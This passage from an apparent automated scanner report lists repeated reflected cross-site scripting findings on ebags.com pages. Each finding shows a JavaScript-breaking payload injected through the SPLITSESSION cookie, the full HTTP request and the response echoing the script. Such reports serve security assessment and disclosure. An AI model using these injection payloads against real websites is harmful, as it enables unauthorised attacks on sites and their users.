<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|85fde';alert(1)//59caba9823');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.41. http://www.ebags.com/brands/department/index.cfm [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brands/department/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b22a'%3balert(1)//865f579b997 was submitted in the SPLITSESSION cookie. This input was echoed as 9b22a';alert(1)//865f579b997 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /brands/department/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C9b22a'%3balert(1)//865f579b997; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:05:04 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:05:04 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 75286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','BECOME01$COUPONID=40959822PRODUCTID=');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|9b22a';alert(1)//865f579b997');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.42. http://www.ebags.com/brands/index.cfm [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brands/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3122a'%3balert(1)//48b6210c93f was submitted in the SPLITSESSION cookie. This input was echoed as 3122a';alert(1)//48b6210c93f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /brands/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C3122a'%3balert(1)//48b6210c93f; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:47 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:47 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 280168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|3122a';alert(1)//48b6210c93f');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.43. http://www.ebags.com/category/backpack-handbags/20036676 [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/backpack-handbags/20036676

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78da4'%3balert(1)//4158ffbec4e was submitted in the SPLITSESSION cookie. This input was echoed as 78da4';alert(1)//4158ffbec4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /category/backpack-handbags/20036676 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C78da4'%3balert(1)//4158ffbec4e; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:09:45 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:09:45 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 111958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|78da4';alert(1)//4158ffbec4e');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.44. http://www.ebags.com/category/clutches/20036679 [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/clutches/20036679

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4748f'%3balert(1)//b29ffd2f072 was submitted in the SPLITSESSION cookie. This input was echoed as 4748f';alert(1)//b29ffd2f072 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /category/clutches/20036679 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C4748f'%3balert(1)//b29ffd2f072; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:10:29 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:10:29 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 120128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|4748f';alert(1)//b29ffd2f072');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.45. http://www.ebags.com/category/clutches/20048616 [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/clutches/20048616

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9fe4'%3balert(1)//0d5903b01c5 was submitted in the SPLITSESSION cookie. This input was echoed as f9fe4';alert(1)//0d5903b01c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /category/clutches/20048616 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cf9fe4'%3balert(1)//0d5903b01c5; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:10:30 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:10:30 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 95979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|f9fe4';alert(1)//0d5903b01c5');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.46. http://www.ebags.com/category/cross-body-bags/20037212 [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/cross-body-bags/20037212

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c47a3'%3balert(1)//6f93ab58282 was submitted in the SPLITSESSION cookie. This input was echoed as c47a3';alert(1)//6f93ab58282 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /category/cross-body-bags/20037212 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cc47a3'%3balert(1)//6f93ab58282; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:11:06 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:11:06 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 116098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|c47a3';alert(1)//6f93ab58282');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.47. http://www.ebags.com/category/handbags/10014 [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/handbags/10014

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3566e'%3balert(1)//65eaa91922f was submitted in the SPLITSESSION cookie. This input was echoed as 3566e';alert(1)//65eaa91922f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /category/handbags/10014 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C3566e'%3balert(1)//65eaa91922f; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:10:10 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:10:10 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 117519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|3566e';alert(1)//65eaa91922f');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.48. http://www.ebags.com/category/handbags/10014/h/sale [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/handbags/10014/h/sale

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b247d'%3balert(1)//b7b3987c633 was submitted in the SPLITSESSION cookie. This input was echoed as b247d';alert(1)//b7b3987c633 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /category/handbags/10014/h/sale HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cb247d'%3balert(1)//b7b3987c633; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:10:07 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:10:07 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 118415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|b247d';alert(1)//b7b3987c633');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.49. http://www.ebags.com/category/hobos/20036674 [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/hobos/20036674

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35db9'%3balert(1)//174c2a7b538 was submitted in the SPLITSESSION cookie. This input was echoed as 35db9';alert(1)//174c2a7b538 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /category/hobos/20036674 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C35db9'%3balert(1)//174c2a7b538; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:11:05 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:11:05 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 113981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|35db9';alert(1)//174c2a7b538');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.50. http://www.ebags.com/category/hobos/20048614 [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/hobos/20048614

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36c7b'%3balert(1)//46d70b3c5ca was submitted in the SPLITSESSION cookie. This input was echoed as 36c7b';alert(1)//46d70b3c5ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /category/hobos/20048614 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
